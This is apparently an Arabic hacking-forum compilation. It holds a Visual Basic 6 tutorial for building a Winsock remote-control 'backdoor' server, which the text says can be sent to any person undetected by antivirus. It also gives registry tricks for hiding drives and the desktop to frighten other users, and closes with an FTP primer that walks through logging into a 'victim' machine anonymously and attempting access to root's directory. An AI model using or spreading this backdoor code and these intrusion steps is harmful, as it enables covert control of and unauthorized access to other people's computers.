Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

Public Const SW_HIDE = 0
Public Const SW_SHOW = 5

Const SWP_HIDEWINDOW = &H80
Const SWP_SHOWWINDOW = &H40
'دالة اخفاء زر ابدأ
Sub HideStartButton()
Dim Handle As Long, FindClass As Long
FindClass& = FindWindow("Shell_TrayWnd", "")
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString)
ShowWindow Handle&, 0
End Sub
' دالة اظهار زر ابدأ
Sub ShowStartButton()
Dim Handle As Long, FindClass As Long
FindClass& = FindWindow("Shell_TrayWnd", "")
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString)
ShowWindow Handle&, 1
End Sub

'دالة اغلاق سواقة الليزر
Sub CDClose()
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Sub

'دالة فتح سواقة الليزر
Sub CDOpen()
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
End Sub
-----------------------------------
-----------------------------------
الحين سلامتك البرنامج الباكدور الي سويناه دزه لاي سخص تبيه مع العلم ان الانتي فايروس ماراح يكتشفه
والبرنامج الي عندك راح تتحكم فيه

منقولللأخhi_hacker
ارجوا عدم استخدامه ضد المسلمين



الجزئ الثالث


----------------------------------------------------------
انشئ زر واسمه فتح سواقه الليزر
واكتب هذا الكود
Private Sub Command3_Click()
On Error Resume Next
wskclient.SendData "openCD"
End Sub
---------------------------------------
---------------------------------------
انشئ زر واسمه اغلاق سواقه الليزر
واكتب هذا الكود
Private Sub Command4_Click()
On Error Resume Next
wskclient.SendData "closeCD"
End Sub
----------------------------------------
----------------------------------------
انشئ زر واسمه اخفاء
ايقونات سطح المكتب
واكتب هذا الكود
Private Sub Command5_Click()
On Error Resume Next
wskclient.SendData "hideDESKTOP"
End Sub
-------------------------------------
--------------------------------------
انشئ زر واسمه اضهار ايقونات سطح المكتب
واكتب هذا الكود
Private Sub Command6_Click()
On Error Resume Next
wskclient.SendData "showDESKTOP"
End Sub
--------------------------------------------
--------------------------------------------
انشئ زر واسمه اخفاء زر ابداء
واكتب هذا الكود
Private Sub Command8_Click()
On Error Resume Next
wskclient.SendData "hideSTART"
End Sub
--------------------------------------------
--------------------------------------------
انشئ زر واسمه اضهار زر ابداء
واكتب هذا الامر
Private Sub Command9_Click()
On Error Resume Next
wskclient.SendData "showSTART"
End Sub
------------------------------------------
-----------------------------------------
انشئ زر واسمه اخفاء شريط المهام
واكتب هذا الكود
Private Sub Command10_Click()
On Error Resume Next
wskclient.SendData "hideTASKBAR"
End Sub
-----------------------------------------------
-----------------------------------------------
انشئ زر واسمه اضهار شريط المهام
واكتب هذا الكود
Private Sub Command11_Click()
On Error Resume Next
wskclient.SendData "showTASKBAR"
End Sub
----------------------------------------------

الحين انشئ fram وذللك من شريط الادوات من الفيجوال بيسك
واسمهه لوحة الاتصال وضح زر الاتصال وزر انهاء الاتصال
---------------------------------------------------------------------
الحين انشئ تايمر وضعه على لوحة الاتصال التي صنعناها من قائمة fram
اوكتب هذا الكود فيه
Private Sub Timer1_Timer()
If wskclient.State = 0 Then status.Caption = "لايوجد إتصال"
If wskclient.State = 6 Then status.Caption = "جاري الإتصال"
If wskclient.State = 7 Then status.Caption = "تم الإتصال مع الخادم"
If wskclient.State = 8 Then status.Caption = "قام الخادم بقطع الإتصال"
If wskclient.State = 9 Then status.Caption = "خطأ في الإتصال"
'توجد 9 مراحل لإجراء عملية الإتصال بين عميل وخادم
If wskclient.State <> sckConnected Then
status.Caption = "لايوجد إتصال"
End If
End Sub
-------------------------------
------------------------------
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي
----------------------------------
----------------------------------
الحين انشئ label وذلك من شريط الادوات في الفيجوال بيسك وسمه
ip
-----------------------------
-----------------------------
الحين انشئ text box وضعها امام label الذي سميناه ip
------------------------------
-----------------------------
الحين انشئ label وسمه port
-------------------------------------
الحين انشئ text box وضعها امام label الي سميناه port
--------------------------------------
الحين انشئ label واتركه فارغا وضعه اسفل الفورم
------------------------------------------------------------------
------------------------------------------------------------------
------------------------------------------------------------------
الحين نكتب برنامج الخادم
انشئ فورم جديد واكتب هذا الكود فيه
Private Sub Form_Load()
'wskServer اسم اداة الوينسوكت في هذا البرنامج
wskServer.LocalPort = 2003
' تعيين منفذ للخادم
wskServer.Listen
' بدء تشغيل الخادم
TaskBarHwnd = FindWindow("Shell_traywnd", "")
' يقوم البرنامج بتحديد تعريف شريط المهام
End Sub
---------------------------------------
---------------------------------------
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي واكتب هذا الكود فيهPrivate Sub
Private Sub wskServer_ConnectionRequest(By
Val requestID As Long)
If wskServer.State <> sckClosed Then _
wskServer.Close
wskServer.Accept requestID
' قبول طلب الاتصال
End Sub

'==== هذا الإجراء يمثل عملية استقبال الاوامر من البرنامج العميل ====
Private Sub wskServer_DataArrival(ByVal bytesTotal As Long)
Dim command As String
'يجب تعريف المتغير الذي سوف يستقبل البيانات القادمة من العميل
wskServer.GetData command
'يمثل هذا السطر استقبال المتغير للاوامر القادمة من العميل

Select Case command ' تحديد الأمر القادم من البرنامج العميل
Case "openCD" ' اذا تم اختيار امر فتح سواقة الليزر يتم تنفيذ الاجراء التالي
CDOpen
Case "closeCD"
CDClose ' اذا تم اختيار امر اغلاق سواقة الليزر يتم تنفيذ الاجراء التالي
Case "hideDESKTOP" ' اذا تم اختيار امر اخفاء ايقونات سطح المكتب يتم تنفيذ الاجراء التالي
Progman& = FindWindow("Progman", vbNullString)
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString)
SysListView& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString)
Call ShowWindow(SysListView&, SW_HIDE)
Case "showDESKTOP" ' اذا تم اختيار امر اظهار ايقونات سطح المكتب يتم تنفيذ الاجراء التالي
Progman& = FindWindow("Progman", vbNullString)
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString)
SysListView& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString)
Call ShowWindow(SysListView&, SW_SHOW)
Case "hideSTART" ' اذا تم اختيار امر اخفاء زر ابدأ يتم تنفيذ الاجراء التالي
HideStartButton
Case "showSTART" ' اذا تم اختيار امر اظهار زر ابدأ يتم تنفيذ الاجراء التالي
ShowStartButton
Case "hideTASKBAR" ' اذا تم اختيار امر اخفاء شريط المهام يتم تنفيذ الاجراء التالي
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_HIDEWINDOW)
Case "showTASKBAR" ' اذا تم اختيار امر اظهار شريط المهام يتم تنفيذ الاجراء التالي
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_SHOWWINDOW)
End Select

End Sub

--------------------------
---------------------------
الحين انشئ label وسمه الي تبي تسميه واكتب الي تبي تكتب فيه انشالله تسميه بوكيمون
---------------------------------------------
----------------------------------------------
الحين انشئ موديل واكتب هذا الكود فيها

' API CALLS
'مجموعة من الدالات التي تختص بتنفيذ الأوامر الخاصة بالخادم

Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

Public Const SW_HIDE = 0
Public Const SW_SHOW = 5

Const SWP_HIDEWINDOW = &H80
Const SWP_SHOWWINDOW = &H40
'دالة اخفاء زر ابدأ
Sub HideStartButton()
Dim Handle As Long, FindClass As Long
FindClass& = FindWindow("Shell_TrayWnd", "")
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString)
ShowWindow Handle&, 0
End Sub
' دالة اظهار زر ابدأ
Sub ShowStartButton()
Dim Handle As Long, FindClass As Long
FindClass& = FindWindow("Shell_TrayWnd", "")
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString)
ShowWindow Handle&, 1
End Sub

'دالة اغلاق سواقة الليزر
Sub CDClose()
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Sub

'دالة فتح سواقة الليزر
Sub CDOpen()
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
End Sub
-----------------------------------
-----------------------------------
الحين سلامتك البرنامج الباكدور الي سويناه دزه لاي سخص تبيه مع العلم ان الانتي فايروس ماراح يكتشفه
والبرنامج الي عندك راح تتحكم فيه



منقوووووول للفــــائدة

--------------------------------------------------------------------------------

السلام عليكم ورحمة اللة وبركاتة وبــعـــد
كيف تجنن مخترقيـن الجهاز ..؟؟ !!
او بطريقة اخرى كيف تقوم بأخفاء يعض الملفات في جهازك .!!
يعتبر ملف الريجستيري من اهم الملفات في نظام التشغيل ويندوز, نظرا لما
يحتويه هذا الملف من معلومات حيوية ومؤثرة في طريقة عمل الجهاز. لذا اذا اردت
تجربة هذه الحيل فننصحك بالقيام بعمل نسخة احتياطية من ملف الريجستري قبل
تجربة احد الحيل التالية. وتأكد انك بعد ان تقوم بأداء هذه الحيل على جهازك
فلن يتجرأ احد على العبث بجهازك مرة اخرى.
حيلة 1: اخفاء محركات الاقراص من جهاز الكمبيوتر
قد تحتاج في بعض الاحيان الى اخفاء محركات الاقراص سواء كانت للاقراص المرنة
او الضوئية "السي دي" او حتى المحرك الرئيسي للجهاز عن اعين الفضوليين,
للقيام بذلك قم بفتح ملف الريجستيري وذلك بكتاب regedit في مربع تشغيل Run
تحت قائمة ابدأ.. ثم انتقل او ابحث عن المفتاح التالي:
HKEY-CURRENT-USER/Software/Microsoft/Windows/CurentVersion/Policies/Explorer قم بالضغط بزر الفأرة الايمن على النافذة التي تظهر لك على اليمين واختر
New ثم DWORD Value واطلق على المدخل الجديد اسم NoDrives ثم قم بالنقر
المزدوج على المدخل الجديد واعطه القيمة 3FFFFFF بعد ذلك اضغط مفتاح F5. اذهب
الى جهاز الكمبيوتر لتفاجأ بأن جميع المحركات قد اختفت, ولاستعادة المحركات
قم بحذق القيمة التي ادخلتها من ملف الريجستيري ـ قد يستدعي الامر احيانا
اعادة تشغيل الجهاز من جديد لاستعادة الاعدادات القديمة ـ .
حيلة 2: اخفاء الامر تشغيل Run وبحث Find من قائمة ابدأ
قد يكون من المسلي احيانا اللعب بجهاز الكمبيوتر كجعل بعض الايقونات او
الاوامر تختفي من اماكنها المعهودة مما يولد الشك في مستخدمي جهازك بأن هناك
خللا في نظام التشغيل لديك.
لحذف امر تشغيل وامر بحث من قائمة ابدأ قم بعمل التالي: قم بفتح ملف
الريجستيري والذهاب الى المفتاح :
HKEY-CURRENT-USER/Software/Microsoft/Windows/CurentVersion/Policies/Explorer قم بالضغط بزر الفأرة الايمن على النافذة التي تظهر لك على اليمين واختر
New ثم DWORD Value واطلق على المدخل الجديد اسم NoFind ثم قم بالنقر المزدوج
على المدخل الجديد واعطه القيمة 1 سيقوم هذا بإخفاء الامر بحث, وبالمثل
بالنسبة للامر تشغيل قم بخلق قيمة كما في الخطوات السابقة ولكن اطلق عليها
الاسم NoRum واعطها القيمة 1 بعد ذلك اضغط مفتاح F5 لتحديث محتويات
الريجستيري. اذهب الى قائمة ابدأ لتجد ان الامرين تشغيل وبحث قد اختفيا..
لاستعادتهما قم بحذف المفتاحين الذين قمت بخلقهما في الريجستيري.
حيلة 3: اخفاء جميع محتويات سطح المكتب ومنع المستخدم من الخروج من ويندوز
اتريد ان ترعب مستخدمي جهازك وتوهمهم بأن هناك خللا في الجهاز.. اذا لماذا لا
تجرب اخفاء جميع محتويات سطح المكتب.. للقيام بذلك اتبع نفس الخطوات السابقة
المشروحة في حيلة 1 او 2 وقم بخلق قيمة DWORD Value باسم NoDesktop واعطها
القيمة 1 ثم اضغط على مفتاح F5 >

لسلام عليكم و رحمة الله و بركاته

اقدم لكم شرح ممل جدا لاختراق الدوس على عدة دروس و المعروف و الاسم الادق

(اختراق الftp اختصار file transfeer protocol)............


مقدمة

ظهرت خدمة بروتوكول نقل الملفات (FTP) في المراحل المبكرة من مسيرة الإنترنت، ولذلك فقد مرت بمراحل عديدة من التطوير للارتقاء بأدائها، ويعتقد الخبراء أن تطورها سيواكب تطور الإنترنت ويسير معها جنبا إلى جنب، مما سيعزز دورها في مستقبل التكنولوجيا في العالم السيبيري (cyber technology).


ملاحظة:

قد لا تؤدي عبارة خدمة بروتوكول نقل الملفات المعنى المطلوب منها، الذي ينص على أنها خدمة الإنترنت المستندة إلى بروتوكول نقل الملفات (Internet service based on File Transfer protocol)، وسعيا للاختصار نستخدم عبارة بروتوكول نقل الملفات أو خدمة نقل الملفات لتدل على المعنى نفسه.

ماهو نقل الملفات FTP?

FTP هي اختصار لكلمة File Transfer Protocol وتعني بروتوكول نقل الملفات، وهذه الخدمة هي احدى تسهيلات TCP/IP التي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزات FTP الرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم تشغيل مختلفة وعليه فلديها أشكال Formats مختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقوم به FTP, وبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفاً في أميركا الى جهازنا.

ما هي خدمة بروتوكول نقل الملفات

يُعد المصطلح FTP اختصاراً لبروتوكول نقل الملفات (File Transfer Protocol)، وهو طريقة سريعة لنقل الملفات (الكبيرة عادةً) بين أجهزة الكمبيوتر البعيدة عن بعضها والموجودة في شبكة تستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت.

ويتشابه بروتوكول نقل الملفات (FTP) مع بروتوكول نقل النص المترابط (HTTP) في كون كلا البروتوكولين ينقل الملفات من الأجهزة الخادمة البعيدة (remote servers)، ولكنهما يختلفان في أن بروتوكول نقل النص المترابط (HTTP) يستخدم المستعرض (Web browser) لعرض الملفات المنقولة على شاشة المستخدم، وتكون تلك الملفات ذات محتوى متعدد الوسائط (Multimedia) –هذا المحتوى الذي يُميز صفحات الويب- ، بينما يُخزِن بروتوكول نقل الملفات (FTP) الملفات المنقولة على القرص الصلب لجهاز المستخدم.

وتبرز أهمية هذه الخدمة عند نقل الملفات الكبيرة التي يعجز البريد الإلكتروني عن نقلها. إذ يمكن لبروتوكول نقل الملفات أن يتعامل مع أي نوع من الملفات سواء أكان معقداً مثل ملفات لغة النص المترابط (HTML) المضغوطة (compressed) وملفات الرسوم (graphic files)، أم بسيطاً مثل الملفات النصية (text files). ويمكن أن تُنقَل هذه الملفات من أجهزة خادمة بعيدة وتُخزَّن على القرص الصلب لجهاز المستخدم عن طريق عملية التنزيل (downloading)، كما تظهر فائدة استخدام خدمة بروتوكول نقل الملفات عند تصميم موقع شخصي على الويب، والحاجة إلى نقل ملفات الموقع إلى الأجهزة الخادمة (servers) عن طريق عملية التحميل (uploading). ويختلف بروتوكول نقل الملفات (FTP) عن البروتوكولات الأخرى التي لا تعتمد على الإنترنت في نقل الملفات مثل: Kermit، وXMODEM، إضافة إلى ZMODEM.


FTP الخادم و FTP المستفيد


تعتمد خدمة (FTP) على مبدأ الخادم/المستفيد (client/server)، ويكون فيه خادم FTP عبارة عن خادم ملفات يعتمد بروتوكول (FTP) في تحميل وتنزيل الملفات على أدلته (directories) شرط وجود الصلاحية المحددة باسم تعريف خاص (ID) وكلمة مرور (password) .

ومن الجدير بالذكر أن الملفات الموجودة في خادم (FTP) تكون مضغوطة، وبالتالي يكون استرجاعها أكثر سرعة وسهولة، وتتعدد صيغ الملفات المضغوطة المستعملة؛ إذ نجد: .arc ، و .cpt ، و .zip، و .Z، بينما تكون صِيغ ملفات الرسوم من مثل: ".gif، و .jpg"، أما الملفات المخزنة بصيغة ثنائية (binary files) فتكون صيغها من مثل: ".hqx، و .uu". وإلى جانب الملفات السابقة تحتوي الأجهزة الخادمة لبروتوكول ملفات “read me” التي تبتدئ أسماؤها عادة بالرمز "00"، وبالتالي تظهر هذه الملفات في بداية القائمة. وتنبع أهمية التمييز بين أنواع الملفات من أن خدمة بروتوكول نقل الملفات تستخدم تعليمات مختلفة تتمتع بمواصفات نقل متمايزة لكل نوع من تلك الأنواع.

ومن جهة أخرى، فإنه يلزم لنقل الملفات باستخدام بروتوكول (FTP) وجود برنامج يدعى برنامج مستفيد FTP (FTP client)، وهو برنامج يُمَكِّن المستخدم من تنزيل وتحميل الملفات من وإلى موقع FTP ما عبر شبكة تَستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت. وتوجد الكثير من التطبيقات التي تقوم بوظيفة مستفيد FTP وتُناسب مُختلف أنواع الأجهزة، ويمكن تنزيل الكثير منها مجاناً عن طريق الإنترنت.



المستخدم (anonymous FTP)


تسمح هذه الميزة للمستخدمين بالولوج إلى مواقع (FTP) دون الحاجة إلى التعريف بأنفسهم، إذ يمكنهم استخدام كلمة “anonymous” أو كلمة “ftp” على أنها اسم المستخدم (user-ID)، ويُوضع البريد الإلكتروني للمستخدم مكان كلمة مرور (password). ويغلب استخدام هذه الميزة في عمليات تنزيل الملفات من المواقع العامة التي توفرها بعض الجامعات والشركات الحكومية والخاصة على الإنترنت. ولكن مشكلة هذه المواقع تكمن في صعوبة الاتصال بها بسبب الضغط الكثيف عليها.

لماذا خدمة بروتوكول نقل الملفات (FTP) بدلاً من البريد الإلكتروني ومستعرضات الويب؟

تتميز خدمة (FTP) عن البريد الإلكتروني (Email) بأمور عديدة فهي أكثر فعالية في نقل الملفات الكبيرة، كما أنها أسرع من البريد الإلكتروني، مما يكفل تنفيذ المهمة نفسها في زمن أقل من زمن نقلها عن طريق البريد الإلكتروني، وهذا يجعل خدمة بروتوكول نقل الملفات أوفر.

أما ما يُميز خدمة بروتوكول نقل الملفات (FTP) عن مستعرضات الويب (Web browsers) فهو:

• تستطيع خدمة (FTP) القيام بعملية تحميل الملفات (uploading)، إذ تنقل المعلومات وخاصة وثائق (HTML) إلى الخادم البعيد الذي تُخزن عليه صفحات الويب.


• تَستخدِم خدمة (FTP) أوامرَ (commands) لإجراء عمليات التحديث (حذف، أو إعادة تسمية أو نقل أو نسخ) على الملفات الموجودة على الخادم.


• تدعم خدمة (FTP) السرية (privacy)، إذ يكون للمستخدمين المرخصين كلمات مرور (passwords) تسمح لهم بالولوج إلى الخادمات البعيدة.


_-_Bonz0_-_ 04-18-2004 09:21 PM

--------------------------------------------------------------------------------

علاقة (FTP) مع البريد الإلكتروني:

بدأت تُستخدم مؤخراً طريقة أخرى لاسترجاع الملفات عن طريق خادم بريدي خاص لخدمة (FTP)، لا تحتاج فيها إلى برنامج مستفيد FTP (FTP client)، ولكن يكفي أن يكون لك حساب بخدمة البريد الإلكتروني (Email account)، إذ يقوم خادم بريد بروتوكول نقل الملفات بالعمليات التي تقوم بها خدمة نقل الملفات، ثمَّ تُرسَل النتيجة عن طريق البريد الإلكتروني إلى المستخدم، ولا تخفى فوائد هذا التوظيف لخدمة بروتوكول نقل الملفات في البريد الإلكتروني لما تقدمه من سرعة وضمان في نقل الملفات الكبيرة، لم يكن بمقدور مستخدم البريد العادي الحصول عليها، وإليك فيما يلي أمثلة عن بعض الأجهزة الخادمة لبريد بروتوكول نقل الملفات (FTP):



ftpmail@ppa.dec.com
ftpmail@decwrl.dec.com
ftpmail@src.doc.ic.ac.uk



لولوج إلى (FTP) عن طريق مستعرضات الويب

تُستخدَم مستعرضات الويب للولوج إلى ملفات موجودة في مواقع FTP، ويتم ذلك بسهولة عبر النقر على الروابط links. فللاتصال بموقع FTP تستبدل الحروف http في حقل العنوان (URL) بالحروف التالية ftp، ويكتب بعدها اسم الموقع (site name). ويمكن أن يُستخدم كل من:Netscape Navigator, Internet Explorer في الولوج إلى مواقع FTP، مع وجود الكثير من القيود التي لا يمكن حلها إلا بالحصول على التراخيص المناسبة.


برامج مستفيد FTP


يوجد العديد من برامج مستفيد FTP التي تعمل على أجهزة أي بي إم (IBM) أو الأجهزة المتوافقة معها، وتلائم العديد من أنظمة التشغيل (مثل: دوس (DOS)، وويندوز (Windows). كما إن نظم التشغيل الأحدث مثل ويندوز (Windows 95) 95 وويندوز (Windows 98) 98 وويندوز(Windows NT) NT تدعم خدمة بروتوكول نقل الملفات عبر برنامج خدمي (Utility program) هو ftp يظهر على شكل واجهة أوامر سطرية (command-line interface)؛ تشبه برنامج مستفيد FTP المُستخدم في نظام يوني** (Unix)، كما تستخدم أجهزة أخرى تعمل على نظام يوني** (Unix) برنامجَ مستفيد FTP آخر يدعى (NcFTP).

كما توجد العديد من البرامج التي تعمل في بيئة رسومية تدعم خاصة السحب والإفلات (drag and drop)، ونذكر مثالين على هذه البرامج:



• البرنامج WS FTP: للعمل على منصة التشغيل ويندوز (Windows).


• البرنامج FETCH: للعمل على منصة التشغيل ماكنتوش (Macintosh).


أقسام نقل الملفات:

نقل الملفات ينقسم الى قسمين:

===================

تنزيل الملفات Download:

وهو جلب الملفات من الكمبيوتر المضيف Host الى الجهاز المحلي Local.

ارسال الملفات Uplaod:

وهو ارسال الملفات من الكمبيوتر المحلي Local الى الكمبيوتر المضيف Host.

ومن الناحية الأمنية فهناك نوعان لنقل الملفات:

نقل مؤمن Secure FTP:


تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف.


نقل مجهول Anonymous FTP:


لاتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالباً استخدام guest أو anonymous عوضاً عنهما.

تصنف مصادر البرامج على الانترنت الى ثلاثة أقسام:

ملكية عامة Public Domain:


وضعت البرامج هنا للاستخدام العام فليس هناك حقوق ملكية لأحد ولا قيود على استخدامها وتوزيعها وتعديلها.


مصادر مجانية Freeware:


يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر ولا يجوز تعديلها أو بيعها.


مصادر مشتركة Shareware:


يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد لاتتضمن جميع المميزات ويجب تحطيم النسخ بعد انتهاء مدتها.

FTP والفيروسات:


يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمين:


ASCII:


اختصاراً لـ(American Standard Code for Information Interchange) والملفات من هذا النوع تحتوي على سبعة جزيئات bits تتراوح قيمتها بين الصفر و 127. ويستخدم هذا المصطلح للتعبير عن المعيار الذي يقوم بتحويل الأحرف الى أرقام في الكمبيوتر. وتستخدم الملفات النصية هذا النوع من الصيغ.


Binary:


وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات bits تتراوح بين الصفر و 255 وتندرج الصور والبرامج والملفات المضغوطة تحت هذا النوع.

والفيروسات لا يمكن أن تنتقل عبر ملفات ASCII كما لايمكن أن تنتقل عبر الصور كصيغ jpg & gif & bmp وغيرها من امتدادات الصور ولا عبر ملفات الفيديو والصوت مثل avi - ram - mpg - mp3 - wav وغيرها، وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة ماتكون: exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - b64 - bhx، كما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات MS Office، لذلك احذر من هذه الملفات وافحصها دائماً قبل تشغيلها.

طريقة نقل الملفات FTP:

هناك طرق عديدة لنقل الملفات وهي:

نقل الملفات باستخدام نظام UNIX


تتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر UNIX:



ascii: لنقل ملفات ASCII النصية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر.

binary: لنقل الملفات الثنائية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر.

status: لفحص الملف ومعرفة هل هو من نوع ASCII أو Binary.

help: لعرض قائمة بأوامر UNIX.

dir: عرض محتويات الدليل

ls: عرض محتويات الدليل الحالي.

cd directory: تغيير الدليل.

get filename: جلب الملف المطلوب وانزاله على جهازك.

mget filename:جلب مجموعة من الملفات.

pwd: طباعة الدليل الحالي.

bye: انهاء الارتباط والخروج من النظام البعيد.



نقل الملفات باستخدام حساب Shell:

أول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمثلاً سوف تدخل حسابك في Tripod عن طريق Unix Shell، نكتب أولاً الأمر ftp متبوعاً بالوجهة المرادة فيصبح: ftp ftp.tripod.com ثم ندخل الاسم وهو عل سبيل المثال "IronPrivate"، ثم نقوم بادخال الرقم السري وهو مثلاً "******". وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر Unix المعتادة.

نقل الملفات باستخدام المتصفح Browser:

نقل الملفات عن طريق المتصفحات سهل جداً فما عليك سوى ادخال عنوان الموقع URL ويبدأ العنوان بكلمة //tp ثم العنوان بدلاً من كلمة //:http للعناوين العادية، بعد الدخول الى موقع الـFTP ستأتي الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب لانزاله.

نقل الملفات باستخدام حساب SLIP/PPP:

أفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة Client Programs. وأفضل برنامج تابع يمكن استخدامه للنوافذ Windows هو برنامج Ws_ftp.

- استخدام برنامج Ws_ftp LE 5.06:

ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج، سيظهر لك مربع حوار Session Profile والذي من خلاله تقوم بتسجيل الدخول، اكتب في خانة Profile Name اسم حساب الدخول؛ على سبيل المثال My Home Page In Tripod واكتب في خانة Host Name اسم الملقن وفي هذا المثال هو ftp.tripod.com ثم في خانة Host Type اختر Auto Detect لكي يقوم بالتدقيق التلقائي في نوع نظام الجهاز المضيف، بعد ذلك قم بكتابة الاسم في خانة User ID وهو مثلاً IronPrivate ثم الرقم السري في خانة Password وسيظهر مخفياً على هيئة نجوم ******, ثم اضغط OK.

_-_Bonz0_-_ 04-18-2004 09:21 PM

--------------------------------------------------------------------------------


نقل الملفات باستخدام الاتصال الشبكي البعيد Telnet:

Telnet هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر مضيف جاعلاً جهازه وكأنه جزء من ذلك الكمبيوتر البعيد. ويختلف العرض حسب نظام الكمبيوتر المضيف. اذا كان الجهاز البعيد يستخدم نظام Windows فلا مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعض الأوامر للتحكم وأهم أمر يجب أن تعرفه هو "؟" والذي يحضر لك قائمة بالأوامر اللازمة.

استخدام برنامج Telnet من Windows:

ترفق Windows برنامجاً سهلاً يسمى Telnet يمكنك الدخول عليه بالضغط على قائمة ابدأ Start ثم تشغيل Run ثم اكتب Telnet وستنفتح لك صفحة البدء للبرنامج.. من Connect اختر Remote System. في صندوق الحوار Connect الذي سيظهر لك اكتب في خانة Host Name اسم ملقن الجهاز المضيف ثم اكتب في خانة Port الميناء أو المنفذ ( اذا كان لديك) او اتركه كما هو، ثم اختر من الـTerm Type ، ان كان لديك والا قم بالتجربة. بعد ذلك اضغط Connect وعندما يتم الربط فستحتاج لادخال الاسم والرقم السري. وبعد الانتهاء من النقل اخترDisconnect من قائمة Connect وبعد ذلك اختر Exit.

=========

الاختراق :

=======

FTP
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البور
21
مفتوح و هو البور الخاص ب
FTP
و لتأكد من أن البور مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها


Superscanne


بعدما تتأكد ان البور مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
سوف تطلع لك نافدة في الدوس مكتوب عليها
FTP>
ؤوكي لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
سوف تتحصل عب النتيجة التالية
FTP>
To
أكتب بجانب
To
رقم الإبي للضحية ثم إضغط على إدخال
و الآن خد بالك معي

إدا تحصلت على هدا الرد فقد تخطيت خطوة


Connected to http://www.assassin.com/
220 websrv1 Microsoft FTP Service (Version 4.0).


و الآن أكتب الكتابة التالية


ftp>quote user ftp


إدا تحصلت على هدا الرد فقد تخطيت خطوة


331 Anonymous acces allowed, send identify (e-mail name) as password.


و الآن أكتب الكتابة التالية


ftp>quote cwd ~root


إذا تحصلت على هدا الرد فقد تخطيت خطوة


530 Please login with USER and PASS


ثم أكتب الكتابة التالية


ftp>quote pass ftp


إدا تحصلت على هدا الرد فقد تخطيت خطوة
و نجحت في الإقتحام

230 Anonymous user logged in.


مبروك أنت الآن في جهاز الضحية
ما عليك الآن الا ان تقوم بإستعمال
اوامر الف تي بي


